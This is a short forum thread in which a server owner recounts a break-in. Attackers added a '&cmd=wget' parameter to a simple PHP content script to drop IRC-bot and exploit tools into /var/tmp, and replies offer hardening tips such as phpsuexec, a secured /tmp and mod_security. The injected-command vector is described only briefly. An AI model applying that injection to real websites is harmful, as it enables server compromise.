I know it's a silly question, but here goes:

I was recently hacked and had to order a restore, what I want to know is, is my server "live" after the restore? Will my box be vulnerable to attack if comes back on while I'm at work, and haven't had time to lock him up proper? Or is the box restored and only open to ssh until told otherwise?

The bastards got in through MSIE using a wget command line in a simple php script on a website. The website used to insert content, and the hackers added &cmd=wget to upload eggdrop, massplo, and bindary to my var/tmp folder.

I thought I had it tight, no direct login for root, telnet not enabled, only sshd 2, bound only to my IP address, listening on a secret port, on a private ip address, firewall, chkrootkit, rootkithunter, email on root access, cron jobs and all the rest of that good stuff. I searched through all the threads on making my server a secure place.

Ah, the indignity. I was hacked through MSIE.

there is alot more to securing a box then what you have mentioned. but after a resotore it will come back online just as a new machine. since your under the same ip you can still behacked but i am guessing a user hacked a php script that you were hosting and they wont get in untill that user is back up.

try running phpsuexec and securing php better.
disabled compilers just in case and secure tmp.
could aslo limit wget access

~Tim

yeah, i already limited wget access, that's what they used to get in. i did a fair amount of other things to secure my box, i just didn't feel like making a laundry list.

Yeah, the user hacked a php script, and I noted which one it was. Very simple, tiny little script. I'm still cussing about it.

Look in my signature the guide there will help out a lot by securing /tmp, setting up mod_security, among other things. No server is totaly secure, but it will certainly help.